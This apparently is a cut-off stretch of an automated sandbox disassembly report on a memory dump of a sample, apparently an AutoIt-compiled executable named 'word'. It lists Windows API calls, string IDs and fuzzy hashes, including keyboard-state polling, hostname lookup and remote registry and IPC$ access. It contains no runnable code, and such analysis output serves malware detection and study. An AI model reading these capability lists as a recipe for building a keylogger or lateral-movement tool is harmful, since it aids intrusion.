                                                                              • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?), ref: 0045336E
                                                                              • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                            • GetDriveTypeW.KERNEL32(?,?,00000061), ref: 00475EEC
                                                                            • _wcscpy.LIBCMT ref: 00475F18
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                            • String ID: a$all$cdrom$fixed$network$ramdisk$removable$unknown$HH
                                                                            • API String ID: 3052893215-4176887700
                                                                            • Opcode ID: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                            • Instruction ID: 30c0e749cffa51fc832ec364bb88d57898ea161693411a08ebb212f54f1b1ce2
                                                                            • Opcode Fuzzy Hash: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                            • Instruction Fuzzy Hash: E951E5716047009BC710EF51D981B9BB3D4AB85705F108C2FF948AB382D7B9DE09879B
                                                                            APIs
                                                                              • Part of subcall function 004419ED: DeleteObject.GDI32(?), ref: 00441A53
                                                                            • SendMessageW.USER32(750A0E13,00001001,00000000,00000000), ref: 00448E73
                                                                            • SendMessageW.USER32(750A0E13,00001026,00000000,00000000), ref: 00448E7E
                                                                              • Part of subcall function 00441A7A: CreateSolidBrush.GDI32 ref: 00441ACB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                            • String ID: X+
                                                                            • API String ID: 3771399671-1938338529
                                                                            • Opcode ID: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                                            • Instruction ID: ebbecaf0548398ae771b9aa28ebf0b72f134f9ffbbfb28b2279bd799396bd9e3
                                                                            • Opcode Fuzzy Hash: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                                            • Instruction Fuzzy Hash: F4510930208300AFE2209F25DD85F6F77EAEB85B14F14091EF994E72D0CBB9E9458769
                                                                            APIs
                                                                            • StringFromIID.OLE32(?,?), ref: 004582E5
                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                            • CoTaskMemFree.OLE32(?), ref: 00458335
                                                                            • RegOpenKeyExW.ADVAPI32 ref: 00458351
                                                                            • RegQueryValueExW.ADVAPI32 ref: 00458381
                                                                            • CLSIDFromString.OLE32(00000000,?), ref: 004583AF
                                                                            • RegQueryValueExW.ADVAPI32 ref: 004583E8
                                                                            • LoadRegTypeLib.OLEAUT32(?,?), ref: 00458486
                                                                              • Part of subcall function 00413F97: __wtof_l.LIBCMT ref: 00413FA1
                                                                            • RegCloseKey.ADVAPI32(?), ref: 004584BA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: FromQueryStringValue_wcslen$CloseFreeLoadOpenTaskType__wtof_l_wcscpy
                                                                            • String ID: Version$\TypeLib$interface\
                                                                            • API String ID: 656856066-939221531
                                                                            • Opcode ID: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                            • Instruction ID: 73379605cfaaf105ee685c6daddaf2c4824f5dc828714578f474d0d05c7db838
                                                                            • Opcode Fuzzy Hash: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                            • Instruction Fuzzy Hash: 19513B715083059BD310EF55D944A6FB3E8FFC8B08F004A2DF985A7251EA78DD09CB9A
                                                                            APIs
                                                                              • Part of subcall function 00456354: GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                              • Part of subcall function 00456354: ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                              • Part of subcall function 00456354: GetAsyncKeyState.USER32 ref: 004563D0
                                                                              • Part of subcall function 00456354: GetAsyncKeyState.USER32 ref: 004563DC
                                                                            • DefDlgProcW.USER32(?,00000205,?,?,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F55F
                                                                            • ImageList_DragLeave.COMCTL32(00000000,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F57D
                                                                            • ImageList_EndDrag.COMCTL32 ref: 0046F583
                                                                            • ReleaseCapture.USER32 ref: 0046F589
                                                                            • SetWindowTextW.USER32(?,00000000,?,?,00000000,00000000,?,00000000), ref: 0046F620
                                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0046F630
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID$X+$HH
                                                                            • API String ID: 2483343779-2266684231
                                                                            • Opcode ID: 5127d0ffcd17cb1bef4f2f1971358f36b919fc832d8745dd5c7fc1032c5585dd
                                                                            • Instruction ID: 4b94e37398fb4c0e8bf176de98e3888209b69965db7f8e5b86c8cb252d1f017b
                                                                            • Opcode Fuzzy Hash: 5127d0ffcd17cb1bef4f2f1971358f36b919fc832d8745dd5c7fc1032c5585dd
                                                                            • Instruction Fuzzy Hash: EB5106716043119BD700DF18DC85FAF77A5EB89310F04492EF941973A2DB789D49CBAA
                                                                            APIs
                                                                            • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E676
                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                            • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E69A
                                                                            • __swprintf.LIBCMT ref: 0045E6EE
                                                                            • _printf.LIBCMT ref: 0045E7A9
                                                                            • _printf.LIBCMT ref: 0045E7D2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: LoadString_printf$__swprintf_wcslen
                                                                            • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                            • API String ID: 3590180749-2354261254
                                                                            • Opcode ID: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                            • Instruction ID: 835382aeb01427732dc6b750cf2ba574ed77461063debdd42288bdc21f9728b4
                                                                            • Opcode Fuzzy Hash: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                            • Instruction Fuzzy Hash: B051D5715143019BD324FB51CC41EAF77A8AF84354F14093FF94563292DB78AE49CB6A
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                            • String ID: %.15g$0x%p$False$True
                                                                            • API String ID: 3038501623-2263619337
                                                                            • Opcode ID: 5f8c1c8e91388a45c2c83d9d903153b896fd08d16315a930f67df6de34675593
                                                                            • Instruction ID: 2d826072eebb3cc9b8b6a8fde8b9da0ebc7f558755c715a4a51c402ed3db85ba
                                                                            • Opcode Fuzzy Hash: 5f8c1c8e91388a45c2c83d9d903153b896fd08d16315a930f67df6de34675593
                                                                            • Instruction Fuzzy Hash: 5741E5B2504204ABD700EF35EC06EAB73A4EB95304F04892FFD0997282F67DD619976E
                                                                            APIs
                                                                            • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 0046FD8A
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,004A83D8,?), ref: 0046FDF0
                                                                            • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 0046FE0E
                                                                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,004A83D8,?), ref: 0046FE20
                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0046FEA5
                                                                            • SendMessageW.USER32(?,0000113F,00000000,?), ref: 0046FEDF
                                                                            • GetClientRect.USER32(?,?), ref: 0046FEF2
                                                                            • RedrawWindow.USER32(?,?,00000000,00000000), ref: 0046FF02
                                                                            • DestroyIcon.USER32(?), ref: 0046FFCC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                            • String ID: 2$X+
                                                                            • API String ID: 1331449709-2332518873
                                                                            • Opcode ID: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                            • Instruction ID: e79942d1a0196d9b5e30c5c178d8ccafd59c9ae1e7fac48b8759c586c5a3b44e
                                                                            • Opcode Fuzzy Hash: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                            • Instruction Fuzzy Hash: EB51AC702043019FD320CF44D885BAABBE5FB88700F04487EE684872A2D7B5A849CB5A
                                                                            APIs
                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                            • _memset.LIBCMT ref: 00458194
                                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004581D6
                                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,00000000), ref: 004581F4
                                                                            • RegOpenKeyExW.ADVAPI32 ref: 00458219
                                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?), ref: 00458248
                                                                            • CLSIDFromString.OLE32(00000000,?), ref: 00458279
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0045828F
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00458296
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset_wcslen
                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                            • API String ID: 2255324689-22481851
                                                                            • Opcode ID: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                            • Instruction ID: 0916ae95de1959dc40878de41837780f7e862baf069d4d5c3429810960799c2e
                                                                            • Opcode Fuzzy Hash: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                            • Instruction Fuzzy Hash: 4A4190725083019BD320EF54C845B5FB7E8AF84714F044D2EFA8577291DBB8E949CB9A
                                                                            APIs
                                                                            • RegOpenKeyExW.ADVAPI32 ref: 00458513
                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00458538
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00458615
                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                            • RegOpenKeyExW.ADVAPI32 ref: 0045858A
                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000028), ref: 004585A8
                                                                            • __wcsicoll.LIBCMT ref: 004585D6
                                                                            • IIDFromString.OLE32(?,?), ref: 004585EB
                                                                            • RegCloseKey.ADVAPI32(?), ref: 004585F8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpen$EnumFromQueryStringValue__wcsicoll_wcslen
                                                                            • String ID: ($interface$interface\
                                                                            • API String ID: 2231185022-3327702407
                                                                            • Opcode ID: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                            • Instruction ID: 2ed788c9a442d2de66cb2a0eaf665167c450c6ff9570aaff4df7cfaf3afbbce1
                                                                            • Opcode Fuzzy Hash: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                            • Instruction Fuzzy Hash: CE317271204305ABE710DF54DD85F6BB3E8FB84744F10492DF685A6191EAB8E908C76A
                                                                            APIs
                                                                            • WSAStartup.WSOCK32(00000101,?), ref: 004365A5
                                                                            • gethostname.WSOCK32(00000100,00000100,00000101,?), ref: 004365BC
                                                                            • gethostbyname.WSOCK32(00000101,00000100,00000100,00000101,?), ref: 004365C6
                                                                            • _wcscpy.LIBCMT ref: 004365F5
                                                                            • WSACleanup.WSOCK32 ref: 004365FD
                                                                            • inet_ntoa.WSOCK32(00000100,?), ref: 00436624
                                                                            • _strcat.LIBCMT ref: 0043662F
                                                                            • _wcscpy.LIBCMT ref: 00436644
                                                                            • WSACleanup.WSOCK32(?,?,?,?,?,?,00000100,?), ref: 00436652
                                                                            • _wcscpy.LIBCMT ref: 00436666
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscpy$Cleanup$Startup_strcatgethostbynamegethostnameinet_ntoa
                                                                            • String ID: 0.0.0.0
                                                                            • API String ID: 2691793716-3771769585
                                                                            • Opcode ID: 65646d0c3f70c30576c3209c49215e1e6413ca059fa52035c9da78ad10046a0d
                                                                            • Instruction ID: 29d249c793a1599df1911ffab6ed89036a29d54f41df1114d8fa63e2d2305339
                                                                            • Opcode Fuzzy Hash: 65646d0c3f70c30576c3209c49215e1e6413ca059fa52035c9da78ad10046a0d
                                                                            • Instruction Fuzzy Hash: 5C21D4726003016BD620FB269C42FFF33A89FD4318F54492FF64456242EABDD58983AB
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048C968,0000000C,00416C4D,00000000,00000000,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B24
                                                                            • __crt_waiting_on_module_handle.LIBCMT ref: 00416B2F
                                                                              • Part of subcall function 0041177F: Sleep.KERNEL32(000003E8,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 0041178B
                                                                              • Part of subcall function 0041177F: GetModuleHandleW.KERNEL32(00411739,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00411794
                                                                            • GetProcAddress.KERNEL32(00000000,EncodePointer,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B58
                                                                            • GetProcAddress.KERNEL32(00411739,DecodePointer,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B68
                                                                            • __lock.LIBCMT ref: 00416B8A
                                                                            • InterlockedIncrement.KERNEL32(00EA60FF,?,00411739,00417F28,00413979,?,?,00411739), ref: 00416B97
                                                                            • __lock.LIBCMT ref: 00416BAB
                                                                            • ___addlocaleref.LIBCMT ref: 00416BC9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                            • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                            • API String ID: 1028249917-2843748187
                                                                            • Opcode ID: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                                            • Instruction ID: dfb830706c011728ae11a8c0f52cb2fa371409e71f4acd403326aacb15a29bdd
                                                                            • Opcode Fuzzy Hash: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                                            • Instruction Fuzzy Hash: 4E119671944701AFD720EF76C905B9EBBE0AF00714F10495FE469A6391DB78A580CB1D
                                                                            APIs
                                                                            • GetSysColorBrush.USER32 ref: 00410326
                                                                            • RegisterClassExW.USER32 ref: 00410359
                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                            • InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                            • LoadIconW.USER32 ref: 004103B1
                                                                            • ImageList_ReplaceIcon.COMCTL32(00A5B930,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                            • API String ID: 2914291525-1005189915
                                                                            • Opcode ID: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                            • Instruction ID: c8c51aded5b6d43d10953d3ded2c15c159303f3bf9a059b11759766ceadcbce4
                                                                            • Opcode Fuzzy Hash: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                            • Instruction Fuzzy Hash: 9F2129B4518301AFD340DF64D888B4EBFF4FB89704F008A2EF685962A0E7B58144CF5A
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?), ref: 00453C0D
                                                                            • SetKeyboardState.USER32(?), ref: 00453C5A
                                                                            • GetAsyncKeyState.USER32 ref: 00453C82
                                                                            • GetKeyState.USER32(000000A0), ref: 00453C99
                                                                            • GetAsyncKeyState.USER32 ref: 00453CC9
                                                                            • GetKeyState.USER32(000000A1), ref: 00453CDA
                                                                            • GetAsyncKeyState.USER32 ref: 00453D07
                                                                            • GetKeyState.USER32(00000011), ref: 00453D15
                                                                            • GetAsyncKeyState.USER32 ref: 00453D3F
                                                                            • GetKeyState.USER32(00000012), ref: 00453D4D
                                                                            • GetAsyncKeyState.USER32 ref: 00453D77
                                                                            • GetKeyState.USER32(0000005B), ref: 00453D85
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: State$Async$Keyboard
                                                                            • String ID:
                                                                            • API String ID: 541375521-0
                                                                            • Opcode ID: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                            • Instruction ID: 09d2c23b2f41f951af40c960ff4fa7a39ed3d74d48f5bb091813d5d41b5bf946
                                                                            • Opcode Fuzzy Hash: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                            • Instruction Fuzzy Hash: BD5108311497C42AF731EF6048217A7BBE45F52782F488D5EE9C107283E619AB0C976B
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000001), ref: 00437DD7
                                                                            • GetWindowRect.USER32(00000000,?), ref: 00437DE9
                                                                            • MoveWindow.USER32(00000000,0000000A,?,?,?,00000000), ref: 00437E5C
                                                                            • GetDlgItem.USER32(?,00000002), ref: 00437E70
                                                                            • GetWindowRect.USER32(00000000,?), ref: 00437E82
                                                                            • MoveWindow.USER32(00000000,?,00000000,?,?,00000000), ref: 00437EDB
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00437EEA
                                                                            • GetWindowRect.USER32(00000000,?), ref: 00437EFC
                                                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00437F46
                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00437F55
                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 00437F6E
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00437F78
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                            • String ID:
                                                                            • API String ID: 3096461208-0
                                                                            • Opcode ID: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                                                            • Instruction ID: 6334a21bf5495bf578199e0a0c43900503e40640961724061e29feeedb49a886
